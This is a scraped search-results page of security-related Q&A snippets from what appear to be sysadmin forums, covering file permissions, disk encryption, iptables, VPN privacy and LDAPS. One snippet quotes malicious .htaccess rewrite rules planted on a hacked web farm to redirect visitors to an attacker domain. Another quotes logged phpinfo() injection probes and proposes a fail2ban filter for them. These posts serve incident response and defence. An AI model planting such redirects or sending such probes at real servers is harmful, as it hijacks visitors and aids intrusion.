Search Results

Search found 16593 results on 664 pages for 'adf security deploy'.

Page 165/664 | < Previous Page | 161 162 163 164 165 166 167 168 169 170 171 172  | Next Page >

  • My Window's 7 is exposing me and my files I am the only administrator.

    - by Connie
    I am the only administrator on my Window's 7 Asus x53E series laptop. Why is a standard user able to access my files by just searching my name in the start menu? If I log into guest account and search my name it shows an error that i don't have permission. When i log into my roommate's standard account and go to the start menu I put my name in search and everything I have done or searched is open to them . How can i make my administrator account private

    Read the article

  • What are the current options to encrypted a partition on mac os x ?

    - by symbion
    I recently got my laptop stolen with some sensitive informations on it (personal source code, bank details in a secure file, passwords, etc) and I learnt the lesson: encrypt your sensitive data. Now, I am wondering what are the options to encrypt a partition (not an encrypt disk image) ? Aim: The aim is to prevent anyone (except me) to access those data. Requirement 0: The software must be able to encrypt non system partition. Requirement 1: Plausible deniability is required but preventing cold boot attack is however not an absolute requirement (I am not famous enough or have sensitive enough info to have this kind of requirement). Requirement 2 : Software taking advantage of AES hardware encryption are very welcome as I intent to get a Macbook Pro with i7 CPU (with AES-NI enabled instructions). I will have avirtual machine running in the encrypted partition. Requirement 3 : Free or reasonably cheap. Requirement 4 : Software must run on Mac OS X Snow Leopard or Lion. So far, TrueCrypt is the only option I have found. Regards,

    Read the article

  • Is there some file browser that uses low level functions to browse hard disk?

    - by watbywbarif
    I have Windows 7, NTFS hard disk. I have detected rootkit files but can't delete them through Windows explorer, obviously because they are not visible. Is there some other file browser that is using low level function calls, lower that win api, so that I can try to see and study these files before removal. I know the exact locations. I know that I can load some live CD and delete them, but I wonder about the first possible solution.

    Read the article

  • Finding Webserver Vulnerability

    - by Brent
    We operate a webserver farm hosting around 300 websites. Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites. The content of the .htaccess file was this: RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is. I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole? So far we have determined: the changes were made as www-data, so apache or it's plugins are likely the culprit all the changes were made within 15 minutes of each other, so it was probably automated since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site) if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse) Any more hints would be appreciated.

    Read the article

  • How intrusive is using VPN?

    - by Slade
    My company lets us work from home sometimes using VPN (during weather emergencies and stuff). When logging in a big window comes up that says the network is private and for employees only and that there's no right to privacy while using VPN. It makes sense that they don't want people poking around their network but I wonder if the company can use the connection to look around my computer while I'm connected. I'm not entirely computer-illiterate but I'm not a networks person at all so the technical documents I've found don't help me. Is that possible, and if so to what degree? UPDATE Thanks Mark. The funneling thing is what I was really asking about. Mostly I was worried that I would already have some IM conversation open or log into eBay forgetting that the VPN was open and that my company IT people would see it or that they would log my eBay password. Thanks again. ANOTHER UPDATE What if my son wants to play online poker or Warcraft etcetera while I have VPN on to work? Can my company think I'm the one playing if I am not typing often?

    Read the article

  • Mysterious visitor to hidden PHP page

    - by B. VB.
    On my website, I have a "hidden" page that displays a list of the most recent visitors. There exist no links at all to this single PHP page, and, theoretically, only I know of its existence. I check it many times per day to see what new hits I have. However, about once a week, I get a hit from a 208.80.194.* address on this supposedly hidden page (it records hits to itself). The strange thing is this: this mysterious person/bot does not visit any other page on my site. Not the public PHP pages, but only this hidden page that prints the visitors. It's always a single hit, and the HTTP_REFERER is blank. The other data is always some variation of Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; FunWebProducts; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.4; yplus 5.1.04b) ... but sometimes MSIE 6.0 instead of 7, and various other plug ins. The browser is different every time, as with the lowest-order bits of the address. And it's just that. One hit per week or so, to that one page. Absolutely no other pages are touched by this mysterious vistor. Doing a whois on that IP address showed it's from the new york area, and from the "Websense" ISP. The lowest order 8 bits of their address are always different, but always from 208.80.194.*/8. From most of the computers that I access my website, doing a tracerout to my server does not contain a router anywhere along the way with the IP 208.80.*. So that rules out any kind of HTTP sniffing, I might think. I have NO idea how, why this is happening. Does anyone have any clue, or have seen something as strange as this before? It seems completely benign, but unexplainable and a little creepy. Thanks in advance!

    Read the article

  • File permissions on web server

    - by plua
    I have just read this useful article on files permissions, and I am about to implement a as-strict-as-possible file permissions policy on our webserver. Our situation: we have a web server accessed through sftp by different users from within our company, and we have the general public accessing Apache - sometimes uploading files through PHP. I distinguish folders and files by their use. So based on this reading, here is my plan: All people who need to upload files will have separate users. But all of those users will belong to two groups: uploaders, and webserver. Apache will belong to the group webserver. Directories Permission: 771 Owner: user:uploaders Explanation: to access files in the folder, everybody needs to have execute permission. Only uploaders will be adding/removing files, so they also get r+w permission. Files within the web-root Permission: 664 Owner: user:uploaders Explanation: they will be uploaded and changed by different users, so both owner and group need to have w+r permissions. Webserver needs to only read files, so r permission only. Upload-directories Permission: 771 Owner: user:webserver Explanation: when files need to be uploaded, Apache needs to be able to write to this directory. But I figure it is safer to change the owner to webroot, thus giving Apache sufficient privileges (and all uploaders also belong to this group and will have the same permissions), while safeguarding from "others" writing to this folder. Uploaded files Permission: 664 Owner: user:webserver Explanation: after uploading Apache might need to delete files, but this is no problem because they have w+r permission of the folder. So no need to make this file any more accessible than r access for group. Being not an expert on file permissions, my question is whether or not this is the best possible policy for our situation? Any suggestions welcome.

    Read the article

  • Linux File Permissions & Access Control Query

    - by Jason
    Hi, Lets say I am user: bob & group: users. There is this file: -rw----r-- 1 root users 4 May 8 22:34 testfile First question, why can't bob read the file as it's readable by others? Is it simply that if you are denied by group, then you are auto-blacklisted for others? I always assumed that the final 3 bits too precedence over user/group permission bits, guess I was wrong... Second question, how is this implemented? I suppose it's linked to the first query, but how does this work in relation to Access Control, is it related to how ACLs work / are queried? Just trying to understand how these 9 permission bits are actually implemented/used in Linux. Thanks alot.

    Read the article

  • strategy /insights for avoiding document content loss due to encryption

    - by pbernatchez
    I'm about to encourage a group of people to begin using S-Mime and GPG for digital signatures and encryption. I foresee a nightmare of encrypted documents which can no longer be recovered because of lost keys. The thorniest issue is archiving. The natural way to preserve privacy in an archive is to archive the encrypted document. But that opens us up to the risk of a lost key when time comes to unarchive a document, or a forgotten password. After all it will be a long way in the future. This would be equivalent to having destroyed the document. First thought is archiving keys with documents, but that still leaves the forgotten pass phrase. Archiving the passphrase too would be tantamount to archiving in the clear. No privacy. What approaches do you use? What insights can you offer on the issue?

    Read the article

  • Allow outgoing connections for DNS

    - by Jimmy
    I'm new to IPtables, but I am trying to setup a secure server to host a website and allow SSH. This is what I have so far: #!/bin/sh i=/sbin/iptables # Flush all rules $i -F $i -X # Setup default filter policy $i -P INPUT DROP $i -P OUTPUT DROP $i -P FORWARD DROP # Respond to ping requests $i -A INPUT -p icmp --icmp-type any -j ACCEPT # Force SYN checks $i -A INPUT -p tcp ! --syn -m state --state NEW -j DROP # Drop all fragments $i -A INPUT -f -j DROP # Drop XMAS packets $i -A INPUT -p tcp --tcp-flags ALL ALL -j DROP # Drop NULL packets $i -A INPUT -p tcp --tcp-flags ALL NONE -j DROP # Stateful inspection $i -A INPUT -m state --state NEW -p tcp --dport 22 -j ACCEPT # Allow established connections $i -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # Allow unlimited traffic on loopback $i -A INPUT -i lo -j ACCEPT $i -A OUTPUT -o lo -j ACCEPT # Open nginx $i -A INPUT -p tcp --dport 443 -j ACCEPT $i -A INPUT -p tcp --dport 80 -j ACCEPT # Open SSH $i -A INPUT -p tcp --dport 22 -j ACCEPT However I've locked down my outgoing connections and it means I can't resolve any DNS. How do I allow that? Also, any other feedback is appreciated. James

    Read the article

  • Windows - Decrypt encrypted file when user account is destroyed

    - by dc2
    I have a Virtual Machine running on my Windows Server 2008 computer that originally was received by me encryped, as the builder of the VM did it on a MAC, which decrypts files by default. I never thought to decrypt these files, as they automatically 'decrypt' when you have permission over them, so the VM has been running for over a year despite the encryption. I just upgraded my computer to Domain Controller (dcpromo.exe). Now when I try to access/run the VM, I can't because I don't have permission to decrypt the files as that was on another logon (local administrator) and now I am the domain administrator. Apparently the local admin is totally nuked when you upgrade to domain controller. I have tried EVERYTHING - taking ownership of the files, which works. Doesn't do anything for me. Adding full control to everyone on the files. I go to File Properties Advanced Details (under encryption) Users who can access this file. The only user is administrator@localcomputername, and there is a cert number. I try adding a new cert, I don't have permission. I don't have permission to: Decrypt the file (access is denied). Copy the file (to another computer) - access denied. I am totally stumped and this VM is a production machine and needs to get up right now. Does anyone have any ideas?

    Read the article

  • securing communication between 2 Linux servers on local network for ports only they need access to

    - by gkdsp
    I have two Linux servers connected to each other via a cross-connect cable, forming a local network. One of the servers presents a DMZ for the other server (e.g. database server) that must be very secure. I'm restricting this question to communication between the two servers for ports that only need to be available to these servers (and no one else). Thus, communication between the two servers can be established by: (1) opening the required port(s) on both servers, and authenticating according to the applications' rules. (2) disabling IP Tables associated with the NIC cards the cross-connect cable is attached to (on both servers). Which method is more secure? In the first case, the needed ports are open to the external world, but protected by user name and password. In the second case, none of the needed ports are open to the outside world, but since the IP Tables are disabled for the NIC cards associated with the cross-connect cables, essentially all of the ports may be considered to be "open" between the two servers (and so if the server creating the DMZ is compromized, the hacker on the DMZ server could view all ports open using the cross-connect cable). Any conventional wisdom how to make the communication secure between two servers for ports only these servers need access to?

    Read the article

  • What statistics app should I use for my website?

    - by Camran
    I have my own server (with root access). I need statistics of users who visit my website etc etc... I have looked at an app called Webalyzer... Is this a good choice? I run apache2 on a Ubuntu 9 system... If you know of any good statistics apps for servers please let me know. And a follow-up question: All statistics are saved in log-files right? So how large would these log-files become then? Possibility to split them would be good, dont know if this is possible with Webalyzer though...

    Read the article

  • How to troubleshoot this memory usage?

    - by Camran
    I have a classifieds website. I use PHP, MySql, and SOLR. Solr uses a Servlet Container, in my case JETTY, which is java application. I just noticed that something was terribly wrong on my website. I opened the terminal and entered the "top" command and noticed that JAVA was EATING all the cpu and mem. Now I thought "Ok, maybe I need more mem and cpu" So I increased it. But along with the increase the java app started eating more. This has never happened before, and it is either a bug, or a hack of some kind. Anyways, I need to troubleshoot this now, and so I wonder how do I do this? Can I somehow pinpoint exactly when the memory usage started to go up from some error log? How does one troubleshoot this? How do I prevent it? Is it possible to prevent too many requests somehow, if they are within a timeline? Thanks

    Read the article

  • How to securely connect to multiple different LDAPS servers (Debian)

    - by Pickle
    I'm trying to connect to multiple different LDAPS servers. A lot of the documentation I've seen recommends setting TLS_REQCERT never, but that strikes me as horribly unsecure to not verify the certificate. So I've set that to demand. All the documentation I've seen says I need to update ldap.conf with a TLS_CACERT directive pointing to a .pem file. I've got that .pem file set up with the certificate from LDAP Server #1, and ldaps connections are happening fine. I've now got to communicate securely with another LDAP server in another branch of my organization, that uses a different certificate. I've seen no documentation on how to do this, except 1 page that says I can simply put multiple (not chained) certificates in the same .pem file. I've done this and everything is working hunky dorey. However, when I told a colleague what I did, he sounded like the sky was falling - putting 2 non-chained certificates into one .pem file is apparently the worst thing since ... ever. Is there a more acceptable way to do this? Or is this the only accepted way?

    Read the article

  • Use .htaccess to block *All* access to specific folders.

    - by Urda
    I am not sure how to do this, but I want to block all access to a specific set of folders on my web server. Say secret01 and secret 02... homeDir |- data |- www | |- .htaccess (file) | |- images | |- js | |- secret01 | |- secret02 | |... |... What rule(s) do I need to add to my root .htaccess file to do this? I want all access from the web blocked from going into these folders, period. Only way one could get to them would be over SFTP or SSH. So what rule am I looking for? I am preferably looking for a one-liner so I can add more folders or move it to another site down the road. I really would prefer if the rule could be placed in the .htaccess root file so I don't have to jump all over the place to lock and unlock folders.

    Read the article

  • Member of local Administrators group cannot elevate

    - by fixme
    Hi We have just installed the first Windows 7 (professional) workstation in our domain. Its primary user has been added to the local (computer's) Administrators group (computername\Administrators). Still, whenever elevation is needed, his credentials are not accepted, and he is never allowed to act as an administrator. For example, he cannot write a file to C:\ (not that he needs to, but it illustrates the problem). Putting him in the domain's Administrators group doesn't help either (anyway we'd rather not do that). I suspect that he may be the victim of some policy that controls elevation, but can't seem to find it. Can anyone shed some light?

    Read the article

  • is there any valid reason for users to request phpinfo()

    - by The Journeyman geek
    I'm working on writing a set of rules for fail2ban to make life a little more interesting for whoever is trying to bruteforce his way into my system. A good majority of the attempts tend to revolve around trying to get into phpinfo() via my webserver -as below GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1 GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1 GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1 GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1 I'm wondering if there's any valid reason for a user to attempt to access phpinfo() via apache, since if not, i can simply use that, or more specifically the regex GET //[^>]+=phpinfo\(\) as a filter to eliminate these attacks

    Read the article

  • Dangers of the pyton eval() statement

    - by LukeP
    I am creating a game. Specifically it is a pokemon battle simulator. I have an sqlite database of moves in which a row looks something like: name | type | Power | Accuracy | PP | Description However, there are some special moves. For said special moves, their damage (and other attributes not shown above, like status effects) may be dependant on certian factors. Rather than create a huge if/else in one of my classes covering the formulas for every one of these moves. I'd rather include another column in the DB that contains a formula in string form, like 'self.health/2'(simplified example). I could then just plug that into eval. I always see people saying to stay away from eval, but from what I can tell, this would be considered an acceptable use, as the dangers of eval only come into play when accepting user input. Am I correct in this assumption, or is there somthing i'm not seeing.

    Read the article

  • Taking user out of MACHINENAME\Users group does not disallow them from authenticating with IIS site

    - by jayrdub
    I have a site that has anonymous access disabled and uses only IIS basic authentication. The site's home directory only has the MACHINENAME\Users group with permissions. I have one user that I don't want to be able to log-in to this site, so I thought all I would need to do is take that user out of the Users group, but doing so still allows him to authenticate. I know it is the Users group that is allowing authentication because if I remove that group's permissions on the directory, he is not allowed to log in. Is there something special about the Users group that makes it so you are actually always a part of it? Is the only solution to revoke the Users group's permissions on the site's home directory and grant a new group access that contains only the allowed users?

    Read the article

  • Outbound ports to allow through firewall - core requirements

    - by dunxd
    This question was asked before, but in a rather general way. I'm asking more specifically based on my current requirements. We have a number of remote offices made up of a bunch of PCs and an ASA 5505 which is used as firewall and VPN termination point. In the offices we share the internet connection with one or more other organisations over whom we have very little control, asides from the config on the ASAs. For a bunch of reasons I'd like to lock down these ASA 5505s to only allow outbound traffic to ports used by applications we know we need. I'm putting a standard config to roll out to all the ASAs, and if we need to open up ports for the other orgs we can do it on request. But I want to leave open the most commonly required ports so we can get up and running without waiting on other folks technical staff to get back. I plan to allow the following TCP ports to support email and web access, which I know everyone will need: POP3 (110 and 995) HTTP (80 and 443) IMAP4 (143 and 993) SMTP (25 and and 465) The question really is, what other ports do I need to leave open to allow for "normal" working? I've seen UDP port 53 for DNS as one. Are there any others that would be worth opening up? Just to note - I'll also be setting up monitoring systems to keep an eye on the ports we do allow. Any of the above could be misused of course. We'll also back all this up with signed agreements. But I'm aiming for a technical solutions where I don't have to start out with the full requirements of everyone we share connections with. See also: outbound ports that are always open

    Read the article

< Previous Page | 161 162 163 164 165 166 167 168 169 170 171 172  | Next Page >